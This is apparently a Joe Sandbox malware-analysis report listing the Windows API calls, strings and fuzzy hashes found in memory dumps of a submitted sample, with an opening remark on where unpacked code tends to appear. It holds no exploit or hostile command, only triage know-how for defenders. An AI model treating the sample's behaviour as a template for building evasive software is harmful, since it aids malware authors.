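For this sample the only executable dump is the 0x321000 region (RVA 0x1000, PAGE_EXECUTE_READ, MEM_IMAGE), so nothing is flagged; a PAGE_EXECUTE_READWRITE or MEM_PRIVATE executable region in the same list would be, and that is where to look first for unpacked code.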
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0038D5EA
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0038D67D
                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0038D691
                                                                                                                    • CoCreateInstance.OLE32(003B2D7C,00000000,00000001,003D8C1C,?), ref: 0038D6DD
                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0038D74C
                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0038D7A4
                                                                                                                    • _memset.LIBCMT ref: 0038D7E1
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0038D81D
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0038D840
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0038D847
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0038D87E
                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0038D880
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1246142700-0
                                                                                                                    • Opcode ID: 4353c8540880e7b1092cafd08b3081c4fbd77e070fb81709c8b777d1aeab0d1c
                                                                                                                    • Instruction ID: 62453fd30b85f1aec6dd71cf3a2f577b9f679db00d2fc5586b818e7893980175
                                                                                                                    • Opcode Fuzzy Hash: 4353c8540880e7b1092cafd08b3081c4fbd77e070fb81709c8b777d1aeab0d1c
                                                                                                                    • Instruction Fuzzy Hash: 94B10D75A00219AFDB05EFA4C885DAEBBB9FF49314F1484A9F909DB261DB30ED41CB50
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0037C283
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0037C295
                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0037C2F3
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0037C2FE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0037C310
                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0037C364
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037C372
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0037C383
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0037C3C6
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0037C3D4
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0037C3F1
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0037C3FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: 5ca7a380b0b233b33431b355d4e237683d4e09240fb554edac74df6bfda80d2e
                                                                                                                    • Instruction ID: 8f7454cd8528181cc6fdd9b53d2c21155f1880e86797a58096c539665704fa92
                                                                                                                    • Opcode Fuzzy Hash: 5ca7a380b0b233b33431b355d4e237683d4e09240fb554edac74df6bfda80d2e
                                                                                                                    • Instruction Fuzzy Hash: 0F515371B10205AFDF19CFA9DD89AAEBBBAEB88310F14812DF519D72A0D7749D008B10
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00321B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00322036,?,00000000,?,?,?,?,003216CB,00000000,?), ref: 00321B9A
                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003220D3
                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0032216E
                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0035BCA6
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0035BCD7
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0035BCEE
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003216CB,00000000,?,?,00321AE2,?,?), ref: 0035BD0A
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0035BD1C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 641708696-0
                                                                                                                    • Opcode ID: 3e13b37e32299b4282baac0e115ce47eaf9c666a94ba81349f5fc68260da54b6
                                                                                                                    • Instruction ID: 8cb5d1d192e189cf46d6e13bb2834fb10aa63d26c2ec9cd125b748d700d62e2d
                                                                                                                    • Opcode Fuzzy Hash: 3e13b37e32299b4282baac0e115ce47eaf9c666a94ba81349f5fc68260da54b6
                                                                                                                    • Instruction Fuzzy Hash: EB619131500A60EFCB379F15ED88B26B7F9FF41316F518628E9824A9B0C771A895DB90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003225DB: GetWindowLongW.USER32(?,000000EB), ref: 003225EC
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 003221D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259745315-0
                                                                                                                    • Opcode ID: e4a445cd75e667d411511f7a3d4550549c8545711940849179e6bd57e545ab8e
                                                                                                                    • Instruction ID: 681f19c82013c528a6bee0039af5e5a9020697cc0f6002bb92f86b87e3e48173
                                                                                                                    • Opcode Fuzzy Hash: e4a445cd75e667d411511f7a3d4550549c8545711940849179e6bd57e545ab8e
                                                                                                                    • Instruction Fuzzy Hash: D7419131100654EFDB275F68EC88BBA3B69EB06331F194365FD659A1E1C7328C42DB21
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,003AF910), ref: 0038A90B
                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,003D89A0,00000061), ref: 0038A9D5
                                                                                                                    • _wcscpy.LIBCMT ref: 0038A9FF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                    • Opcode ID: afbed73333a051c9adcd7a7f31e594f9245fe764eec0ed528b067b1d257afd22
                                                                                                                    • Instruction ID: 99bad35f7090edf19e89e76c1e3555de7cfe10c3929a87a9e08b3bbbd77cac0e
                                                                                                                    • Opcode Fuzzy Hash: afbed73333a051c9adcd7a7f31e594f9245fe764eec0ed528b067b1d257afd22
                                                                                                                    • Instruction Fuzzy Hash: 3951AD315087019FD306EF14D892AAFB7E9FF85300F15486EF5995B2A2DB31A909CB93
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                    • Opcode ID: 64f22e00f0699c45179baac3b0343b20f0a18bfc2db64e1c1387ae679ee93b37
                                                                                                                    • Instruction ID: c0a0f82b0e461110415f31671dd4a2208859c813ec8e1a8e361786f585857b79
                                                                                                                    • Opcode Fuzzy Hash: 64f22e00f0699c45179baac3b0343b20f0a18bfc2db64e1c1387ae679ee93b37
                                                                                                                    • Instruction Fuzzy Hash: 4641C771A04219AFDB26DF34E842E7677E8FF06300F24487FE949DF291EA31A9458B10
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003A716A
                                                                                                                    • CreateMenu.USER32 ref: 003A7185
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 003A7194
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A7221
                                                                                                                    • IsMenu.USER32(?), ref: 003A7237
                                                                                                                    • CreatePopupMenu.USER32 ref: 003A7241
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A726E
                                                                                                                    • DrawMenuBar.USER32 ref: 003A7276
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                    • Opcode ID: 8651557593b62c120c34cac6ad4ad3d437e903dc868067d546a21b328b70831d
                                                                                                                    • Instruction ID: e7d70efc8af59b3263118e513b8cf9dc2c051a6559b303d0b269214cf7a4420b
                                                                                                                    • Opcode Fuzzy Hash: 8651557593b62c120c34cac6ad4ad3d437e903dc868067d546a21b328b70831d
                                                                                                                    • Instruction Fuzzy Hash: 48413578A01205EFDB22DFA4D984F9A7BB9FF4A310F154528F945A7361D731A910CB90
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003A755E
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 003A7565
                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003A7578
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003A7580
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003A758B
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 003A7594
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003A759E
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003A75B2
                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003A75BE
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                    • Opcode ID: 56a94221e40b1f4c03546b51a0bbcba4b61f5ae8b696bc23aae97a5cbb473c2d
                                                                                                                    • Instruction ID: 786a898cdf8a8d1ccb458c2221830707f94d653a1f2bc01b6ac18889ae5b218d
                                                                                                                    • Opcode Fuzzy Hash: 56a94221e40b1f4c03546b51a0bbcba4b61f5ae8b696bc23aae97a5cbb473c2d
                                                                                                                    • Instruction Fuzzy Hash: CD315632504214AFDF229FA4DC48FEB3B6DEF0B360F110224FA55A60A0C731D821DBA4
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00346E3E
                                                                                                                      • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00346ED7
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00346F0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00346F2A
                                                                                                                    • __allrem.LIBCMT ref: 00346F80
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00346F9C
                                                                                                                    • __allrem.LIBCMT ref: 00346FB3
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00346FD1
                                                                                                                    • __allrem.LIBCMT ref: 00346FE8
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00347006
                                                                                                                    • __invoke_watson.LIBCMT ref: 00347077
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction ID: 29ef9ba09c694d41bae13fe02484dd94c6516cc738d9b1d6c33bc2c177b9023a
                                                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction Fuzzy Hash: 0B712776A00716ABD716AF68DC42BAAB3F8AF05364F104629F814DF291E770FD448791
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00382542
                                                                                                                    • GetMenuItemInfoW.USER32(003E5890,000000FF,00000000,00000030), ref: 003825A3
                                                                                                                    • SetMenuItemInfoW.USER32(003E5890,00000004,00000000,00000030), ref: 003825D9
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 003825EB
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0038262F
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0038264B
                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00382675
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 003826BA
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00382700
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00382714
                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00382735
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4176008265-0
                                                                                                                    • Opcode ID: 47e65a6b8c9ed629b7006e20ed8ea7456e9be2ec682a7eec408295a030895521
                                                                                                                    • Instruction ID: 24cdec357357d8640e6b4d719bb164dbe1e130a3f3580e1abc79452447526523
                                                                                                                    • Opcode Fuzzy Hash: 47e65a6b8c9ed629b7006e20ed8ea7456e9be2ec682a7eec408295a030895521
                                                                                                                    • Instruction Fuzzy Hash: 56618F70900349AFDB23EFA4D988DAFBBB8EB42304F150599F841A7251E771AD05DB20
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A6FA5
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A6FA8
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A6FCC
                                                                                                                    • _memset.LIBCMT ref: 003A6FDD
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A6FEF
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A7067
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 830647256-0
                                                                                                                    • Opcode ID: 117dfec6c2e790c71fd697734fa4b6a599a86403158a81ca1c5cb122a2321ade
                                                                                                                    • Instruction ID: 790ece8f712d17d7c0470686bacb58e210be078f8e2d4d6e3bf0c8bb21a200e3
                                                                                                                    • Opcode Fuzzy Hash: 117dfec6c2e790c71fd697734fa4b6a599a86403158a81ca1c5cb122a2321ade
                                                                                                                    • Instruction Fuzzy Hash: BB617C75A00248AFDB12DFA4CC81EEE77F8EB0A714F144159FA14EB2A1C775AD41DB90
                                                                                                                    APIs
                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00376BBF
                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00376C18
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00376C2A
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00376C4A
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00376C9D
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00376CB1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00376CC6
                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00376CD3
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00376CDC
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00376CEE
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00376CF9
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706829360-0
                                                                                                                    • Opcode ID: e3bdfb01148bb48d85bf2988745beb3393bd6b53ef4fdcc28c224d6fb64151a3
                                                                                                                    • Instruction ID: 5888a9204c44a174a9f5ffe998db421253a9259660468b44225a8af7eada2877
                                                                                                                    • Opcode Fuzzy Hash: e3bdfb01148bb48d85bf2988745beb3393bd6b53ef4fdcc28c224d6fb64151a3
                                                                                                                    • Instruction Fuzzy Hash: 6B418E31A00219DFCF16DFA9D8559EEBBBDEF08300F00C069E955EB261CB34A945CB90
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00395793
                                                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 003957D8
                                                                                                                    • gethostbyname.WSOCK32(?), ref: 003957E4
                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 003957F2
                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00395862
                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00395878
                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003958ED
                                                                                                                    • WSACleanup.WSOCK32 ref: 003958F3
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                    • String ID: Ping
                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                    • Opcode ID: e240bbf922fda0baab2888644e13be28e3eb77bc463c0c7c28e89f2868acfad2
                                                                                                                    • Instruction ID: 34c6e2a6d29a9efeb2803331076d94882c38f388b7d1a1a4272b6529d5cc4ce0
                                                                                                                    • Opcode Fuzzy Hash: e240bbf922fda0baab2888644e13be28e3eb77bc463c0c7c28e89f2868acfad2
                                                                                                                    • Instruction Fuzzy Hash: DD516E316047019FDB23EF64DC45B2AB7E8EF49720F05892AF956DB2A1DB70E940DB42
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038B4D0
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0038B546
                                                                                                                    • GetLastError.KERNEL32 ref: 0038B550
                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0038B5BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: 5bc7cc6270b79c199d944ec55850def8dc507e3adf09b15a22c583141c3ef5a8
                                                                                                                    • Instruction ID: 90cd4986608f391d684a93343ee84bde8abb103147ec997f4d0f01d005189887
                                                                                                                    • Opcode Fuzzy Hash: 5bc7cc6270b79c199d944ec55850def8dc507e3adf09b15a22c583141c3ef5a8
                                                                                                                    • Instruction Fuzzy Hash: 89319435A0030ADFCB12FF68D845EAEB7B8FF0A310F1441A6E505DB291DB719A42CB51
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00379014
                                                                                                                    • GetDlgCtrlID.USER32 ref: 0037901F
                                                                                                                    • GetParent.USER32 ref: 0037903B
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037903E
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00379047
                                                                                                                    • GetParent.USER32(?), ref: 00379063
                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00379066
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: 228bf2c3195996dc096cabb0f36ed5e120d8290088386f5d012d9de6a043de47
                                                                                                                    • Instruction ID: e449931a2d2f3a346106bfe48d8f9e4e02b6116f8776dd5788780aec7236aa64
                                                                                                                    • Opcode Fuzzy Hash: 228bf2c3195996dc096cabb0f36ed5e120d8290088386f5d012d9de6a043de47
                                                                                                                    • Instruction Fuzzy Hash: 6C21F571A00108BFDF16ABA0DC85EFEBB78EF4A310F10421AF925972B1DB795815DB60
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003790FD
                                                                                                                    • GetDlgCtrlID.USER32 ref: 00379108
                                                                                                                    • GetParent.USER32 ref: 00379124
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00379127
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00379130
                                                                                                                    • GetParent.USER32(?), ref: 0037914C
